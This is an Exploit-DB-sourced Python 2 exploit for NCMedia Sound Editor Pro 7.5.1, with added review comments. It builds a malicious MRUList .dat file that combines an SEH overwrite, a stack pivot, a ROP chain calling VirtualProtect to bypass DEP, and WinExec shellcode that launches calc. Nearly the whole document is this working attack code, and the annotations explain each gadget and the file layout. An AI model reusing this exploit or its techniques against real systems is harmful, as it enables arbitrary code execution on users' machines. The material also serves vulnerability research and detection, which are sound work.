NCMedia Sound Editor Pro 7.5.1 – Local Overflow (SEH + DEP Bypass)

  • 作者: b33f
    日期: 2012-10-03
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/21713/
  • #!/usr/bin/python
    
    #---------------------------------------------------------------------------#
    # Exploit: NCMedia Sound Editor Pro v7.5.1 SEH&DEP#
    # Author: b33f - http://www.fuzzysecurity.com/#
    # OS: Windows 7 Pro SP1 (probably universal across 32-bit)#
    # POC - Julien Ahrens XP SP3: http://www.exploit-db.com/exploits/21331/ #
    # Software: http://www.soundeditorpro.com/#
    # HOWTO: put the *.dat file in [USER]\Roaming\Sound Editor Pro\ #
    #open -> click "File" menu -> calc ;))#
    #---------------------------------------------------------------------------#
    # Curiously enough, the only thing that went through the mind of the#
    # ROP-Chain as it was executed was "Oh no, not again"!#
    #---------------------------------------------------------------------------#
    
    import sys, socket, struct 
    
    # NOTE(review): this is a Python 2 script (print statements, str literals
    # used as raw bytes); under Python 3 the "\x.." literals below would be text,
    # not bytes. Of the three modules imported above only struct is used here.
    # `file` shadows the Python 2 builtin of the same name. It is the output
    # file name; the header says the file is expected under the application's
    # Roaming profile directory.
    file="MRUList201202.dat"
    
    #--------------------------------------------------------------------------------------------------------------#
    # Semi-Universal ROP chain based entirely on MSVCR70.dll which comes packaged with "NCMedia Sound Editor"... #
    #--------------------------------------------------------------------------------------------------------------#
    # Each struct.pack('<L', ...) emits one 4-byte little-endian dword, so `rop`
    # is a flat sequence of gadget addresses and immediate values consumed by
    # successive RETNs. Several constants are stored negated and restored with
    # NEG EAX at run time -- presumably to keep the bad bytes listed further
    # down (0x00/0x0d/0x0a) out of the file; verify against the byte values.
    rop = struct.pack('<L',0x7c0126bc)# XCHG EAX,EBP # ADD AL,7C # RETN \
    rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN |
    rop += struct.pack('<L',0x7C0390FD) # VirtualProtect() -> ESI=0 EBP=0 -> 7c039138(VP)-3B | MOV VP -> ESI
    rop += struct.pack('<L',0x7c023a4f) # ADD ESI,DWORD PTR DS:[EAX+EBP+3B] # RETN/
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
    rop += struct.pack('<L',0xFFBF90EF) # NEG is -> 0x00406f11 : jmp esp [SoundEditorPro.exe]| JMP ESP -> EBP
    rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN [MSVCR70.dll] |
    rop += struct.pack('<L',0x7c0126b7) # XCHG EAX,EBP # ADD AL,7C # RETN /
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
    rop += struct.pack('<L',0xFFFFFDFF) # Neg is 201-HEX (513-bytes) | Executable Size -> EBX
    rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
    rop += struct.pack('<L',0x7c01561c) # ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN/
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c026484) # POP EDI # RETN\ROP-NOP -> EDI
    rop += struct.pack('<L',0x7c034e02) # ROP-NOP /
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\
    rop += struct.pack('<L',0xFFFFFFC0) # NEG is 0x40| newProtect -> EDX
    rop += struct.pack('<L',0x7c0167cd) # NEG EAX # RETN |
    rop += struct.pack('<L',0x7c026dc4) # MOV EDX,EAX # INC ECX # MOVZX EAX,BYTE PTR DS:[ECX] # ADD EAX,EDX # RETN/
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c034e01) # POP ECX # RETN\RW lpOldProtect -> ECX
    rop += struct.pack('<L',0x7c049001) # lpOldProtect/
    #--------------------------------------------------------------------------------------------------------------#
    rop += struct.pack('<L',0x7c0358a1) # POP EAX # RETN\NOP padding -> EAX
    rop += struct.pack('<L',0x90909090) # NOP /
    #--------------------------------------------------------------------------------------------------------------#
    # Summary of what the groups above leave in the registers before PUSHAD,
    # per the author's per-gadget notes: ESI = VirtualProtect, EBP = JMP ESP,
    # EBX = size, EDI = ROP-NOP, EDX = newProtect (0x40), ECX = lpOldProtect,
    # EAX = NOP padding. PUSHAD writes them to the stack in one go so that the
    # following RETNs walk into the VirtualProtect call -- the DEP bypass the
    # title refers to.
    rop += struct.pack('<L',0x7c0126b6) # PUSHAD # XCHG EAX,EBP # ADD AL,7C # RETN|PUSHAD -> pwnd!!
    #--------------------------------------------------------------------------------------------------------------#
    
    #----------------------------------
    # Greets to SkyLined, you do great work with shellcode!!
    #----------------------------------
    # Raw x86 machine code held in a Python 2 byte string. Per the inline notes
    # it locates kernel32, walks its export tables to find WinExec and calls it;
    # the bytes 0x63 0x61 0x6c 0x63 pushed after 0x68 are ASCII "calc".
    calc = (
    "\x31\xD2"#
    "\x52"#
    "\x68\x63\x61\x6C\x63"# Stack has arguments for
    "\x89\xE6"# WinExec -> calc
    "\x52"#
    "\x56"########
    "\x64\x8B\x72\x30"#
    "\x8B\x76\x0C"#
    "\x8B\x76\x0C"# Found Kernel32
    "\xAD"# base address
    "\x8B\x30"#
    "\x8B\x7E\x18"########
    "\x8B\x5F\x3C"# Found export table offset
    "\x8B\x5C\x1F\x78"########
    "\x8B\x74\x1F\x20"# Found export names table
    "\x01\xFE"########
    "\x8B\x4C\x1F\x24"# Found export ordinals table
    "\x01\xF9"########
    "\x42"#
    "\xAD"# Found WinExec ordinal
    "\x81\x3C\x07\x57\x69\x6E\x45"#
    "\x75\xF5"########
    "\x0F\xB7\x54\x51\xFE"#
    "\x8B\x74\x1F\x1C"#
    "\x01\xFE"# Pop calc ;))
    "\x03\x3C\x96"#
    "\xFF\xD7") #
    
    #----------------------------------
    # badchars -> '\x00\x0d\x0a'
    # 0x0040e02a {pivot 1092}# ADD ESP,444 # RETN [SoundEditorPro.exe]
    # ROP-NOP Slide 0x7c034e02 [MSVCR70.dll]
    #----------------------------------
    # Ten NOPs in front of the shellcode.
    b00m = "\x90"*10 + calc
    # File layout, left to right: 61 copies of the ROP-NOP address 0x7c034e02
    # in little-endian form (244 bytes), the ROP chain, b00m, "A" padding so
    # that rop + b00m + padding is exactly 3880 bytes, then the little-endian
    # pivot address 0x0040e02a noted above. The file is therefore 4128 bytes;
    # from the defender's side, an MRUList*.dat of that size in the Roaming
    # profile is the artifact to look for. Note that the padding expression
    # silently yields an empty string (and the total size shifts) if
    # rop + b00m ever exceeds 3880 bytes -- nothing checks that bound.
    poc = "\x02\x4E\x03\x7C"*61 + rop + b00m + "\x41"*(3880-len(rop + b00m)) + "\x2A\xE0\x40\x00"
    
    # Writes the payload to `file` in the current directory. Observations:
    # the file is opened in text mode ("w"), not binary, so on Windows any
    # 0x0a byte would be rewritten as 0x0d 0x0a (no 0x0a appears in the values
    # above, so this happens to be harmless here); the bare `except:` catches
    # everything, including KeyboardInterrupt, and discards the error detail;
    # and no `with`/finally closes the handle if write() raises.
    try:
        print "[*] Creating exploit file...\n"
        writeFile = open (file, "w")
        writeFile.write( poc )
        writeFile.close()
        print "[*] File successfully created!"
    except:
        print "[!] Error while creating file!"